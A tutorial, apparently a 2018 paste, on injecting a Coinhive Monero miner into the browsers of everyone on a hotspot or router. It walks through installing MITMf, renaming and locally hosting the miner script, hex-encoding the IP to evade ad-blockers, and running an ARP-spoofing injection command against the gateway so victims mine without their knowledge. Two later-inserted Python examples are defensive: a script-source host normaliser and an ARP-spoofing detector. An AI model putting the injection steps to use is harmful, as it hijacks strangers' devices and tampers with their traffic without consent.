1337ings

How to inject CoinHive into Hotspots/Routers

Mar 17th, 2018
DISCLAIMER! I'm not responsible for any misuse of this tutorial.


Step 1 -- Installing MITMf
I'll be installing MITMf in Kali Linux using apt-get. Simply type the below command into a terminal. If you'd rather install MITMf from the source code, you can reference Takhion's excellent guide to doing so or the instructions on GitHub.

sudo apt-get install mitmf

That's it for installing MITMf. There's absolutely no configuration required after installing it, so let's dive into creating a Coinhive account next.

#--------------------------------------#

Step 2 -- Creating a Coinhive Account

Now that we have MITMf installed, head over to the Coinhive registration page to create an account. There are no requirements for creating an account with Coinhive; anyone can sign up in seconds.

The registration process is very quick and simple. After registering, check your email for the registration confirmation you'll need to complete, then log into your new account. We'll need to locate our unique site key, which is an individual key meant to be used for each website running JavaScript miners. However, we won't be using Coinhive in a conventional way, so we'll only need one site key.

To find your site key, navigate to the "Sites & API Keys" page. The site key we'll be using is next to Site Key (public), so make sure to copy that down for later.

Anyone using an ad-blocker like uBlock Origin will find the Coinhive page appears broken and malformed. uBlock Origin, one of the most popular ad-blockers available, currently blacklists the coinhive.com domain. This is no doubt a result of hackers abusing Coinhive. Disable your ad-blocker to register and use Coinhive.

Ad-blocking issues like this indicate that we'll need to take additional steps to ensure ad-blockers don't prevent the Coinhive miner from running in victim browsers. Most ad-blockers will filter out domain names like coinhive.com that have been reported as behaving maliciously. Obfuscating the domain name and JavaScript filename will be important to the success of this attack.

#--------------------------------------#

Step 3 -- Evading Ad-Blockers

First, head over to the Coinhive documentation page where we'll get a better understanding of the JavaScript we'll be injecting into victim browsers. Below is a JavaScript miner in its simplest form.

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');
miner.start();
</script>

The first script source ("script src") line will instruct victim browsers to download the .js file from the Coinhive website. The "var miner" line will tell Coinhive which account is mining the Monero, and the "miner.start" line instructs victim browsers to start mining immediately. We'll need to focus on obfuscating the coinhive.com domain and the .js filename if we want to evade most ad-blockers.

Just note that using steps 4 and 5 below may not effectively evade all ad-blockers. The way a miner works is that it has to report its proof-of-work back to the server; otherwise, it's just mining for no reason. Since the source code is hard-coded to make calls back to the Coinhive server, ad-blockers that block at the DNS level may still stop the proofs from reaching the server, preventing any cryptocurrency from being earned on the account. However, ad-blockers that only block at the HTML tag level will almost certainly still let it through.

#--------------------------------------#

Step 4 -- Renaming the JavaScript File

To start, let's make a temporary directory on our device to host the Coinhive JavaScript locally. Using the mkdir command, make a directory called "coinhive-js" in the /tmp directory. Then, change into the new coinhive-js directory using the cd command.

mkdir /tmp/coinhive-js
cd /tmp/coinhive-js

When that's done, download the Coinhive JavaScript we'll be injecting into victim browsers. On Unix-like systems, we can use wget from a terminal.

wget https://coinhive.com/lib/coinhive.min.js

Let's also rename the file for further evasion. A random string that's unlikely to be found in an ad-blocker database seems like good practice for this sort of attack. We can easily use OpenSSL from a terminal to generate random strings:

openssl rand -hex 16

The 16 tells OpenSSL how many random bytes to generate, and -hex prints them as hexadecimal characters. If you wish to generate a longer string, simply increase the value to your preference. Next, we can rename the "coinhive.min.js" file with the mv command:

mv coinhive.min.js random-string-here.js

I wasn't clever about my random string name for this demonstration. Simply typing random letters and numbers on your keyboard will suffice.

Last, we'll need to host the JavaScript file so that victim browsers on our Wi-Fi network will be able to download it. For this, we'll use a simple python3 command.

python3 -m http.server 80

http.server is the Python3 HTTP server module we'll be running with the -m argument, and 80 is the port number the HTTP server will listen on. We can verify our Python3 server is up and working by visiting http://127.0.0.1:80 in our browsers. 127.0.0.1 is the loopback address of our computer, commonly used to reach services (like HTTP servers) hosted on the same machine.

#--------------------------------------#

Step 5 -- Obfuscating the URL

With our JavaScript ready to go, let's talk about URL obfuscation with hexadecimal encoding. We can easily evade ad-blocker filters by encoding our local IP address. For example, navigating to http://0xC0A80001 in your browser right now will take you to http://192.168.0.1. Browsers parse a hexadecimal host literal like this as a numeric IPv4 address, exactly as if the dotted form had been typed.

There are online tools for converting IP addresses to hexadecimal strings, and that's the easiest way to go about this. First, find your IP address with the ifconfig command.

ifconfig wlan0

Your local IP address will most likely be something like 192.168.0.2 or 192.168.1.10. When you've figured that out, enter your IP into a hexadecimal converter website to get its hexadecimal equivalent value.

Now, let's put it all together! Here's the Coinhive JavaScript again with a hexadecimal IP address and obfuscated filename:

<script src="http://0x0A989811/ghfldghfsdhglfsdhgfd.js"></script>
<script>
var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');
miner.start();
</script>

Let's now save these 5 lines of code to a file locally, as we'll need to inject it into victim browsers using MITMf. You can use your favorite text editor to save the JavaScript, or type the below nano command into a terminal.

nano /tmp/coinhive-js/miner.js

We'll save it into the coinhive-js directory we created earlier as miner.js. Press Ctrl + X on your keyboard to exit nano, then press Y and Enter to save the file.
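The hex-encoded host in the snippet above only fools a filter that compares the script URL as text. The following Python is an added example, not code from the original paste, showing the check a defender-side filter or page audit should do instead: normalise the host of every script src to a dotted quad before matching, so 0x0A989811 is judged as 10.152.152.17 and a LAN-hosted or numerically disguised loader stands out. The sample HTML fragment, the one-entry blocklist and the reason labels are constructed for this example.

```python
"""Normalise <script src> hosts before matching them against a blocklist.

Added example, not code from the original paste. The sample HTML fragment,
the blocklist and the finding dictionaries are constructed for illustration.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Matches the src attribute of a <script> tag (constructed, deliberately simple).
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']*)["\']',
                           re.IGNORECASE)

# Constructed blocklist keyed on hostnames, the way a filter list usually is.
BLOCKED_HOSTS = {"coinhive.com"}

# Constructed fragment: the injected snippet from the paste (hex host), the
# plain Coinhive loader, and an unrelated script that should pass.
SAMPLE_HTML = """
<p>page content</p>
<script src="http://0x0A989811/ghfldghfsdhglfsdhgfd.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="https://cdn.example.net/app.js"></script>
"""


def normalise_host(host):
    """Return the dotted-quad form of an IPv4 host written any way a browser
    accepts it (dotted, 0x-hex, or a single decimal integer); any other host
    is returned lowercased and unchanged."""
    host = host.strip().lower()
    try:
        if host.startswith("0x"):
            return str(ipaddress.IPv4Address(int(host, 16)))
        if host.isdigit():
            return str(ipaddress.IPv4Address(int(host)))
        return str(ipaddress.IPv4Address(host))
    except ValueError:
        # Not an IPv4 literal in any accepted form (or outside 32-bit range).
        return host


def audit_script_sources(html, blocked_hosts=BLOCKED_HOSTS):
    """Return one finding per external script: the raw src, the normalised
    host, and the reasons it deserves attention (empty list = nothing found)."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        raw_host = urlsplit(src.strip()).hostname or ""
        host = normalise_host(raw_host)
        reasons = []
        if host in blocked_hosts:
            reasons.append("blocked host")
        if host != raw_host:
            reasons.append("numeric host literal")   # hex/decimal disguise
        try:
            if ipaddress.ip_address(host).is_private:
                reasons.append("private address")    # served from the LAN
        except ValueError:
            pass   # a hostname, not an address
        findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_script_sources(SAMPLE_HTML):
        print(finding["host"], finding["reasons"] or "ok")
```

Matching on the normalised host rather than the raw src is the whole point: the decimal form (3232235521 for 192.168.0.1) is caught by the same code path as the hex form, and a script loaded from a private address inside a public hotspot is flagged even when the blocklist has never heard of it.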

#--------------------------------------#

Step 6 -- Injecting the Miner into Browsers

We have MITMf installed, a new Coinhive account, and a JavaScript payload obfuscated to evade pesky ad-blockers. Now let's see how this is actually put to use.

To use MITMf, run the below command.

mitmf -i wlan0 --inject --js-file /tmp/coinhive-js/miner.js --arp --spoof --gateway 192.168.0.1

The -i tells MITMf which network interface to attack on, while wlan0 is the default wireless interface in Kali Linux. The 192.168.0.1 gateway address is the local IP address of the Wi-Fi router; 192.168.0.1 is a very common gateway address. To find your router's local IP address, you can try running the route -n command in a terminal. Under the "Gateway" column, you should see something like "192.168.X.X".

Once we've started the MitM attack, all devices connected to the Wi-Fi network will have our JavaScript payload injected into many of their webpages. We'll know a victim browser was affected by our MitM attack when the MITMf terminal reports "Injected JS file: example.com".

We can clearly see someone using the Google Chrome browser on a Windows operating system visiting stackoverflow.com and our JavaScript payload injected into their browser. Their browser will start mining Monero immediately and will continue to do so until the stackoverflow.com browser tab is closed.

If we take a closer look at the victim's browser, we can see our Coinhive JavaScript payload was injected at the bottom of their stackoverflow.com webpage completely without their knowledge.

You may also notice I installed three of the top ad-blockers from the Chrome Web Store. None of the ad-blockers detected this activity as nefarious or malicious.

After the JavaScript miner has been injected into a victim's browser, you can actually stop the MITMf command to end the attack and the Coinhive JavaScript will continue to mine cryptocurrency in the victim's web browser. If the victim leaves the coffee shop with the browser tab open, the Coinhive JavaScript will continue mining the next time they're online on any Wi-Fi network. The Coinhive miner will continue until the victim closes the infected browser tab or closes their web browser entirely.
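The --arp --spoof part of the command above is what makes the injection possible, and it is also the loudest thing on the wire: the gateway's IP starts answering from a second MAC, and one MAC claims the gateway plus other hosts. The following Python is an added example, not code from the original paste, that detects both patterns from a passive record of ARP replies. The replies, MAC addresses and host IPs are constructed; the gateway 192.168.0.1 is the one used in the mitmf command, and on a real segment the replies would come from a sniffer rather than a list literal.

```python
"""Passive ARP spoofing detection from a record of ARP replies.

Added example, not code from the original paste. The replies, MAC addresses
and hosts below are constructed; on a real segment they would come from a
sniffer (arpwatch-style) rather than a list literal.
"""
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"   # the gateway address used in the mitmf command

# Constructed sample: (seconds since capture start, sender IP, sender MAC).
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.0.1", "aa:bb:cc:00:00:01"),    # the real router
    (0.5, "192.168.0.2", "aa:bb:cc:00:00:02"),    # attacker's laptop, own address
    (1.0, "192.168.0.10", "aa:bb:cc:00:00:10"),   # victim
    (5.0, "192.168.0.1", "aa:bb:cc:00:00:02"),    # laptop now claims the gateway IP
    (5.1, "192.168.0.10", "aa:bb:cc:00:00:02"),   # ... and the victim's IP
    (7.0, "192.168.0.1", "aa:bb:cc:00:00:02"),    # repeated poison reply
]


def detect_arp_spoofing(replies, gateway_ip=GATEWAY_IP):
    """Return (alerts, suspects).

    alerts:   one entry each time an IP is claimed by a MAC not seen for it
              before (an IP->MAC binding change), flagged when it is the gateway.
    suspects: MACs that claim the gateway IP and at least one other IP, which
              is exactly what a host poisoning both sides of a conversation does.
    """
    ip_to_macs = defaultdict(dict)      # ip -> {mac: first_seen}
    mac_to_ips = defaultdict(set)       # mac -> {ip, ...}
    alerts = []
    for ts, ip, mac in replies:
        mac_to_ips[mac].add(ip)
        known = ip_to_macs[ip]
        if mac in known:
            continue                    # same binding as before, nothing new
        known[mac] = ts
        if len(known) > 1:
            alerts.append({
                "time": ts,
                "ip": ip,
                "new_mac": mac,
                "previous_macs": sorted(m for m in known if m != mac),
                "gateway": ip == gateway_ip,
            })
    suspects = sorted(mac for mac, ips in mac_to_ips.items()
                      if gateway_ip in ips and len(ips) > 1)
    return alerts, suspects


if __name__ == "__main__":
    alerts, suspects = detect_arp_spoofing(SAMPLE_ARP_REPLIES)
    for a in alerts:
        print(f"[{a['time']:>4}] {a['ip']} now at {a['new_mac']} "
              f"(was {', '.join(a['previous_macs'])})"
              + ("  <-- GATEWAY" if a["gateway"] else ""))
    print("suspect MACs:", suspects)
```

The binding-change alert on its own also fires on legitimate events such as a replaced router, which is why the second signal matters: a single MAC answering for the gateway and for a client at the same time has no benign explanation on a normal hotspot. A client can apply the same idea locally by pinning the gateway's MAC in a static ARP entry and alerting when a reply disagrees with it.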